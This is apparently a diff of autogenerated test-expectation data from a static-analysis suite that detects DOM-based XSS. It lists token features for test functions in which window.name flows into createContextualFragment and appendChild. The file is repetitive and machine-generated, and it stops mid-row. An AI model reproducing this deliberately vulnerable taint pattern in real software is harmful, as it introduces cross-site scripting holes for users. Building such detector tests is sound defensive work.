URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documentFragment | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documentFragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documentFragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:9:288:66 | documentFragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:32 | range | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:32 | range | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:32 | range | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:32 | range | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:32 | range | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:57 | range.c ... ragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:57 | range.c ... ragment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:57 | range.c ... ragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:57 | range.c ... ragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:57 | range.c ... ragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | exceptional return of range.c ... ainted) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | exceptional return of range.c ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | exceptional return of range.c ... ainted) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | exceptional return of range.c ... ainted) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | exceptional return of range.c ... ainted) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | range.c ... ainted) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | range.c ... ainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | range.c ... ainted) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | range.c ... ainted) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:28:288:66 | range.c ... ainted) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:288:34:288:57 | createC ... ragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:288:34:288:57 | createC ... ragment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:288:34:288:57 | createC ... ragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:34:288:57 | createC ... ragment | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:288:34:288:57 | createC ... ragment | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:288:59:288:65 | tainted | CalleeFlexibleAccessPath | range.createContextualFragment | | autogenerated/Xss/DomBasedXss/tst.js:288:59:288:65 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:288:59:288:65 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17177,6 +119179,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:288:59:288:65 | tainted | enclosingFunctionName | testCreateContextualFragment | | autogenerated/Xss/DomBasedXss/tst.js:288:59:288:65 | tainted | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:288:59:288:65 | tainted | receiverName | range | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:12 | document | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:12 | document | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:17 | document.body | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:17 | document.body | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:17 | document.body | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:17 | document.body | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:29 | documen ... ndChild | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:29 | documen ... ndChild | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:29 | documen ... ndChild | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:29 | documen ... ndChild | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:29 | documen ... ndChild | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | documen ... agment) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | documen ... agment) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | documen ... agment) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | documen ... agment) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | documen ... agment) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | exceptional return of documen ... agment) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | exceptional return of documen ... agment) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | exceptional return of documen ... agment) | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | exceptional return of documen ... agment) | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:5:289:47 | exceptional return of documen ... agment) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:289:14:289:17 | body | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:14:289:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:289:14:289:17 | body | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:14:289:17 | body | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:14:289:17 | body | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:289:19:289:29 | appendChild | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:289:19:289:29 | appendChild | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:289:19:289:29 | appendChild | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:19:289:29 | appendChild | enclosingFunctionName | testCreateContextualFragment | +| autogenerated/Xss/DomBasedXss/tst.js:289:19:289:29 | appendChild | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:289:31:289:46 | documentFragment | CalleeFlexibleAccessPath | document.body.appendChild | | autogenerated/Xss/DomBasedXss/tst.js:289:31:289:46 | documentFragment | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:289:31:289:46 | documentFragment | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17184,6 +119221,142 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:289:31:289:46 | documentFragment | enclosingFunctionBody | tainted window name range document createRange range selectNode document getElementsByTagName div item 0 documentFragment range createContextualFragment tainted document body appendChild documentFragment | | autogenerated/Xss/DomBasedXss/tst.js:289:31:289:46 | documentFragment | enclosingFunctionName | testCreateContextualFragment | | autogenerated/Xss/DomBasedXss/tst.js:289:31:289:46 | documentFragment | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:292:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:292:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:292:0 | this | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:292:0 | this | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:292:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | 'arguments' object of function flowThroughPropertyNames | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | 'arguments' object of function flowThroughPropertyNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | 'arguments' object of function flowThroughPropertyNames | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | 'arguments' object of function flowThroughPropertyNames | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | 'arguments' object of function flowThroughPropertyNames | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | exceptional return of function flowThroughPropertyNames | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | exceptional return of function flowThroughPropertyNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | exceptional return of function flowThroughPropertyNames | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | exceptional return of function flowThroughPropertyNames | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | exceptional return of function flowThroughPropertyNames | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | functio ... // OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | functio ... // OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | return of function flowThroughPropertyNames | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | return of function flowThroughPropertyNames | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | return of function flowThroughPropertyNames | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | return of function flowThroughPropertyNames | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:292:1:297:1 | return of function flowThroughPropertyNames | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:292:10:292:33 | flowThr ... tyNames | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:292:10:292:33 | flowThr ... tyNames | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:292:10:292:33 | flowThr ... tyNames | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:11 | obj | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:11 | obj | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:11 | obj | enclosingFunctionBody | obj obj Math random window name p obj $ p | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:11 | obj | enclosingFunctionName | flowThroughPropertyNames | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:11 | obj | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:293:9:293:16 | obj | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 